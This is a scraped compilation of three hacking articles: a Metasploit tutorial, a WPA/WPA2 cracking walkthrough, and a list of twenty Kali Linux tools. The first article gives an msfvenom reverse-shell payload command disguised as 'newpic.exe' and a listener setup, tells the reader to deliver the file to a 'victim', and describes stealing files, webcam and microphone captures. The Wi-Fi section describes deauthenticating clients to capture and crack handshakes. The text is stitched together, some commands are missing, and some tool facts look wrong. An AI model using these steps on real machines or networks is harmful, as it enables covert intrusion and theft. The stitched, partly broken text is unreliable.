How to use kali linux to hack

How To Hack Windows PC Using Kali Linux and Metasploit

Metasploit provides you with lots of exploits and payloads that you can use to hack any windows pc. In this post, i will show you how hackers use kali linux and metasploit to hack windows.

Just like RATs, you can create metasploit payloads and deliver them to your victim. Then you need to start a listener in metasploit to accept incoming connections. When your victim open the the file you will get a connection back and you can perform all short of tasks remotely.

Using this method hackers steal sensitive information like account details, login email and passwords, media files and much more like they can also execute system commands remotely and play with your system on root level. To get more Ethical Hacking tutorials, go to below link

So let’s see how hackers do that.

Step 1- In kali linux, open the terminal and use this command to generate payload.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.1 lport=4444 -o newpic.exe

In this example, 192.168.43.1 is my and ip address (you need to use your ip address here) and 4444 is the port number that i want to use.

Now you will have a new payload file named newpic.exe (whatever name you used while creating payload) in root folder.

Step 2- You need to deliver this malicious file to your victim.

Step 3- Start the listener to accept incoming connection. Open terminal, type msfconsole and press enter to open the metasploit tool.

There is an exploit in metasploit used to handle reverse connections. We will use that. Enter these commands in terminal one by one to start the listener.

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.43.1

It will start listening for incoming connections over port 4444.

Step 4- Everything is up, now wait for your victim to click on your payload file and when your victim click and open the file you will get a session.

And that’s how hackers hack any windows pc. After getting session, you can perform all sort of tasks like uploading and downloading any file from and to victim’s system, screenshot capturing, capturing pictures using webcam, recording voice using mic and much more.

This is just an example of how hackers hack windows, there are lots of various methods you can use.

Источник

How to Hack WPA/WPA2 WiFi Using Kali Linux?

“Hacking Wifi” sounds really cool and interesting. But actually hacking wifi practically is much easier with a good wordlist. But this world list is of no use until we don’t have any idea of how to actually use that word list in order to crack a hash. And before cracking the hash we actually need to generate it. So, below are those steps along with some good wordlists to crack a WPA/WPA2 wifi.

Note: Use the below methods only for educational/testing purposes on your own wifi or with the permission of the owner. Don’t use this for malicious purposes.

So, boot up Kali Linux. Open the terminal window. And perform the following steps.

Step 1: ifconfig(interface configuration) : To view or change the configuration of the network interfaces on your system.

Here,

• eth0 : First Ethernet interface
• l0 : Loopback interface
• wlan0 : First wireless network interface on the system. (This is what we need.)

Step 2: Stop the current processes which are using the WiFi interface.

Step 3: To start the wlan0 in monitor mode.

Step 4: To view all the Wifi networks around you.

Press Ctrl+C to stop the process when you have found the target network.

Step 5: To view the clients connected to the target network.

Here,

• airodump-ng : For packet capturing
• -c : Channel
• –bssid : MAC address of a wireless access point(WAP).
• -w : The Directory where you want to save the file(Password File).
• wlan0mon : Name of the interface.

Step 6: Open a new terminal window to disconnect the clients connected to the target network.

• aireplay-ng : To inject frames
• -0 : For deauthentication
• 10 : No. of deauthentication packets to be sent
• -a : For the bssid of the target network
• wlan0mon : Name of the interface.

When the client is disconnected from the target network. He tries to reconnect to the network and when he does you will get something called WPA handshake in the previous window of the terminal.

Now, we are done with capturing the packets. So, now you can close the terminal window.

Step 7. To decrypt the password. Open the Files application.

Here,

• hacking-01.cap is the file you need.
• aircrack-ng : 802.11 WEP and WPA-PSK keys cracking program
• -a : -a2 for WPA2 & -a for WPA network
• -b : The BSSID of the target network
• -w : Location of the wordlist file
• /root/hacking-01.cap : Location of the cap file

You can download the file of common passwords from the internet and if you want to create your own file then you can use the crunch tool

Источник

The Best 20 Hacking and Penetration Tools for Kali Linux

It is surprising how many people are interested in learning how to hack. Could it be because they usually have a Hollywood-based impression in their minds?

Anyway, thanks to the open-source community we can list out a number of hacking tools to suit every one of your needs. Just remember to keep it ethical!

1. Aircrack-ng

Aircrack-ng is one of the best wireless password hack tools for WEP/WAP/WPA2 cracking utilized worldwide!

It works by taking packets of the network, analyses it via passwords recovered. It also possesses a console interface. In addition to this, Aircrack-ng also makes use of standard FMS (Fluhrer, Mantin, and Shamir) attack along with a few optimizations such as the KoreK attacks and PTW attack to quicken the attack which is faster than the WEP.

If you find Aircrack-ng hard to use, simply check for tutorials available online.

Aircrack-ng Wifi Network Security

2. THC Hydra

THC Hydra uses brute force attack to crack virtually any remote authentication service. It supports rapid dictionary attacks for 50+ protocols including ftp, https, telnet, etc.

You can use it to crack into web scanners, wireless networks, packet crafters, gmail, etc.

Hydra – Login Cracker

3. John the Ripper

John the Ripper is another popular cracking tool used in the penetration testing (and hacking) community. It was initially developed for Unix systems but has grown to be available on over 10 OS distros.

It features a customizable cracker, automatic password hash detection, brute force attack, and dictionary attack (among other cracking modes).

John The Ripper Password Cracker

4. Metasploit Framework

Metasploit Framework is an open source framework with which security experts and teams verify vulnerabilities as well as run security assessments in order to better security awareness.

It features a plethora of tools with which you can create security environments for vulnerability testing and it works as a penetration testing system.

Metasploit Framework Penetration Testing Tool

5. Netcat

Netcat, usually abbreviated to nc, is a network utility with which you can use TCP/IP protocols to read and write data across network connections.

You can use it to create any kind of connection as well as to explore and debug networks using tunneling mode, port-scanning, etc.

Netcat Network Analysis Tool

6. Nmap (“Network Mapper”)

Network Mapper is a free and open-source utility tool used by system administrators to discover networks and audit their security.

It is swift in operation, well documented, features a GUI, supports data transfer, network inventory, etc.

Nmap Network Discovery and Security Auditing Tool

7. Nessus

Nessus is a remote scanning tool that you can use to check computers for security vulnerabilities. It does not actively block any vulnerabilities that your computers have but it will be able to sniff them out by quickly running 1200+ vulnerability checks and throwing alerts when any security patches need to be made.

Nessus Vulnerability Scanner

8. WireShark

WireShark is an open-source packet analyzer that you can use free of charge. With it you can see the activities on a network from a microscopic level coupled with pcap file access, customizable reports, advanced triggers, alerts, etc.

It is reportedly the world’s most widely-used network protocol analyzer for Linux.

Wireshark Network Analyzer

9. Snort

Snort is a free and open-source NIDS with which you can detect security vulnerabilities in your computer.

With it you can run traffic analysis, content searching/matching, packet logging on IP networks, and detect a variety of network attacks, among other features, all in real-time.

Snort Network Intrusion Prevention Tool

10. Kismet Wireless

Kismet Wireless is a intrusion detection system, network detector, and password sniffer. It works predominantly with Wi-Fi (IEEE 802.11) networks and can have its functionality extended using plugins.

Kismet Wireless Network Detector

11. Nikto

Nikto2 is a free and open-source web scanner for performing quick comprehensive tests against items on the web. It does this by looking out for over 6500 potentially dangerous files, outdated program versions, vulnerable server configurations, and server-specif problems.

Nikto Web Server Scanner

12. Yersinia

Yersinia, named after the yersinia bacteria, is a network utility too designed to exploit vulnerable network protocols by pretending to be a secure network system analyzing and testing framework.

It features attacks for IEEE 802.1Q, Hot Standby Router Protocol (HSRP), Cisco Discovery Protocol (CDP), etc.

Yersinia Network Analyzing Tool

13. Burp Suite Scanner

Burp Suite Scanner is a professional integrated GUI platform for testing the security vulnerabilities of web applications.

It bundles all of its testing and penetration tools into a Community (free) edition, and professional ($349 /user /year) edition.

Burp Security Vulnerability Scanner

14. Hashcat

Hashcat is known in the security experts’ community among the world’s fastest and most advanced password cracker and recovery utility tool. It is open-source and features an in-kernel rule engine, 200+ Hash-types, a built-in benchmarking system, etc.

Hashcat Password Recovery Tool

15. Maltego

Maltego is propriety software but is widely used for open-source forensics and intelligence. It is a GUI link analysis utility tool that provides real-time data mining along with illustrated information sets using node-based graphs and multiple order connections.

Maltego Intelligence and Forensics Tool

16. BeEF (The Browser Exploitation Framework)

BeEF, as the name implies, is a penetration tool that focuses on browser vulnerabilities. With it you can asses the security strength of a target environment using client-side attack vectors.

BeEF Browser Exploitation Framework

17. Fern Wifi Cracker

Fern Wifi Cracker is a Python-based GUI wireless security tool for auditing network vulnerabilities. With it, you can crack and recover WEP/WPA/WPS keys as well as several network-based attacks on Ethernet-based networks.

Fern Wifi Cracker

18. GNU MAC Changer

GNU MAC Changer is a network utility that facilitates an easier and quicker manipulation of network interfaces’ MAC addresses.

Gnu Mac Changer

19. Wifite2

Wifite2 is a free and open-source Python-based wireless network auditing utility tool designed to work perfectly with pen-testing distros. It is a complete rewrite of Wifite and thus, features an improved performance.

It does a good job at decloaking and cracking hidden access points, cracking weak WEP passwords using a list of cracking techniques, etc.

Wifite Wireless Network Auditing Tool

20 .Pixiewps

Pixiewps is a C-based brute-force offline utility tool for exploiting software implementations with little to no entropy. It was developed by Dominique Bongard in 2004 to use the “pixie-dust attack” with the intention to educate students.

Depending on the strength of the passwords you’re trying to crack, Pixiewps can get the job done in a mater of seconds or minutes.

PixieWPS Brute Force Offline Tool

Well, ladies and gentlemen, we’ve come to the end of our long list of Penetration testing and Hacking tools for Kali Linux.

All the listed apps are modern and are still being used today. If we missed any titles don’t hesitate to let us know in the comments section below.

Источник